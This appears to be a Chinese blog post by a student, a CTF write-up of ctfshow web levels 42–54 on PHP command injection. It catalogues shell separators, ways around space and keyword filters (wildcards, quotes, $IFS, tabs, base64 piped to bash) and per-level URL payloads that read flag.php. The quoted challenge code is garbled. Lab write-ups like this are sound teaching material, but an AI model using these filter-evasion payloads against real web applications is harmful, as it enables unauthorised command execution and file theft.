關於CTFshow中Web入門42 54

終於把學校上學期的期末考試考完了，剛好複習的時候跟著群裡的師傅寫了ctfshow上web入門的42-54的題目，其中有很多的坑，但是收穫也是很多的，這裡做一下總結吧！給自己挖了很多的坑，很感謝各位師傅幫我填坑！！！

分隔命令

; //分號應該是最好理解的 | //只執行後面那條命令 || //只執行前面那條命令 & //兩條命令都會執行，不知道是不是自己姿勢不對，沒成功，下面也是一樣

&& //兩條命令都會執行

空格繞過

<
<> //需要寫的許可權
$$ifs$9
%20%09
%3ca=$'cat\x20flag'&&$a
a=$'cat\x09flag'&&$a

黑名單

//一般情況像flag、php這種字元會被ban掉，這時候就需要進行繞過了萬用字元* //匹配任何文字或字串，這個通過測試發現並不能與ifs或《這兩個字元一起使用 ? //匹配單個任意字元空字元$@ //ca$@t flag $1-$9 //ca$1t flag $ //ca$t flag 編碼繞過 echo "y2f0igzsywcucghwcg=="|base64 -d|bash //解碼為cat flag.php並執行變數替換 a=t;b=g;ca$a fla$b.php 引號ca''t fl''ag.php

反斜桿ca\t f\la\g.php

linux檢視檔案命令

cat //cat flag.php tac //tac flag.php head //head flag.php tail //tail flag.php nl //nl flag.php more //more flag.php less //less flag.php od //od flag.php grep //grep 'fla' flag.php strings //strings flag.php

sort //sort flag.php

以下題目均來自：ctfshow

感謝大師傅給我們出了這些有趣有意思的題目，開心

web42

if(isset($_get['c']))else
//這題沒有任何的過濾，只有乙個不回顯的命令，命令分隔一下即可
payload：?c=cat flag.php;

web43

if(isset($_get['c']))
}else
//這題開始增加了黑名單了，過濾了分號-->可以用||繞過；cat則可以換一種檢視檔案的命令，或者使用引號等方式繞過
payload：?c=tac flag.php||

web44

if(isset($_get['c']))
}else
payload：?c=tac fla*||

web45

if(isset($_get['c']))
}else
//這裡開始過濾空格了，利用上面講到的空格繞過即可
payload：?c=tac%09fla?????||

web46

if(isset($_get['c']))
}else
//這裡過濾了數字推測可能是限制使用編碼繞過，過濾了$可以限制比較多，以及萬用字元*，但是還有?
payload：?c=tac%09fla??php||

web47

if(isset($_get['c']))
}else
//新新增了一些檢視檔案的命令進黑名單，但是tac還是可以用的
payload：?c=tac%09fla??php||

web48

if(isset($_get['c']))
}else
//繼續新增黑名單的內容，但是tac還是沒過濾，開心
payload：?c=tac%09fla??php||

web49

if(isset($_get['c']))
}else
payload：?c=tac%09fla??php||

web50

if(isset($_get['c']))
}else
//這裡過濾了%和09，不能用原來的payload，不過換種空格繞過方式即可，這裡有個坑就是<>和?一起使用時沒有回顯，所以這裡用了單引號繞過
payload：?c=tac<>fla%27%27g.php||

後面幾題其實都是差不多的，這裡不多贅述了。

web54

if(isset($_get['c']))
}else
//因為這裡加了匹配的內容，不能使用空字元繞過了，好不容易找到了grep命令，好用！！！因為flag被過濾了，所以對於關鍵字這裡只用了'fla'
payload：?c=grep$'fla'$fla??php

關於CTFshow中Web入門42 54

關於Web中的凍結表頭

web頁面入門

web開發入門

關於CTFshow中Web入門42 54

關於Web中的凍結表頭

web頁面入門

web開發入門

相關推薦